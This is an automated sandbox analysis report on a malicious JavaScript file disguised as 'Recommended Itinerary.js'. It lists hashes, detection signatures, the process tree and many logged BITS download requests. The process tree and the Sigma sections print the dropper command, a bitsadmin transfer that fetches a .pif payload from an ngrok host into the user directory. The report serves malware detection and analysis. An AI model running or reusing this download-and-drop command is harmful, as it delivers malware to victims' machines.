Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Recommended Itinerary.js

Overview

General Information

Sample name:Recommended Itinerary.js
Analysis ID:1576257
MD5:2b62d8f8a2cfb1ad9a00d2633b2bb128
SHA1:5c6cb949735a2f3b6352ed06f4d9ceb700ce0b0c
SHA256:f40c1d241f0c053f957c7f54019b136b159f2a17ce3e170fc581749f2889e718
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Drops PE files to the user root directory
JavaScript file contains Antivirus product strings
Sigma detected: Suspicious Process Parents
Sigma detected: WScript or CScript Dropper
Tries to download files via bitsadmin
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Drops PE files to the user directory
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 9208 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recommended Itinerary.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • bitsadmin.exe (PID: 6960 cmdline: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://041224.ngrok-free.app//BITZX.pif C:\Users\user\BITZX.pif MD5: 01AAB62D5799F75B0D69EB29C1CA6855)
      • conhost.exe (PID: 800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • svchost.exe (PID: 7904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Process Parents
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://041224.ngrok-free.app//BITZX.pif C:\Users\user\BITZX.pif, ParentImage: C:\Windows\System32\bitsadmin.exe, ParentProcessId: 6960, ParentProcessName: bitsadmin.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 800, ProcessName: conhost.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recommended Itinerary.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recommended Itinerary.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4984, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recommended Itinerary.js", ProcessId: 9208, ProcessName: wscript.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recommended Itinerary.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recommended Itinerary.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4984, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recommended Itinerary.js", ProcessId: 9208, ProcessName: wscript.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 880, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7904, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.11.20:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.11.20:49751 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 3.134.125.175 3.134.125.175
Source: Joe Sandbox ViewIP Address: 3.134.125.175 3.134.125.175
Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=0-1119User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=1120-1332User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=1333-1479User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=1480-1956User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=1957-1990User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=1991-2096User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=2097-2210User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=2211-2282User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=2283-2712User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=2713-3070User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=3071-3267User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=3268-3642User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=3643-4266User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=4267-4440User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=4441-4603User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=4604-4786User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=4787-4997User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=4998-5040User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=5041-5223User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=5224-5344User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=5345-5581User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=5582-5863User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=5864-6280User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=6281-6515User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=6516-6591User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=6592-7075User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=7076-7175User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=7176-7508User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=7509-8140User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=8141-8445User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=8446-8617User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=8618-8869User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=8870-9193User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=9194-9553User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=9554-9657User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=9658-9961User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=9962-10374User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=10375-10698User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=10699-10807User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=10808-11121User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=11122-11204User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=11205-11231User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=11232-11474User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=11475-11933User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=11934-12205User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=12206-12319User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=12320-12384User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=12385-12422User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=12423-12554User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=12555-12775User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=12776-12864User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=12865-13028User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=13029-13162User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=13163-13231User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=13232-13352User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=13353-13547User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=13548-13738User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=13739-13841User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=13842-14154User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=14155-14621User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=14622-14826User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=14827-14960User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=14961-15170User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=15171-15739User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=15740-16188User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=16189-16254User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=16255-16394User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=16395-16637User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=16638-17045User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=17046-17172User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=17173-17342User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=17343-17568User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=17569-17711User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=17712-17754User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=17755-18245User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=18246-18701User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=18702-19130User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=19131-19373User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=19374-19927User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=19928-20392User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=20393-20488User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=20489-20672User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=20673-20809User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=20810-20981User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
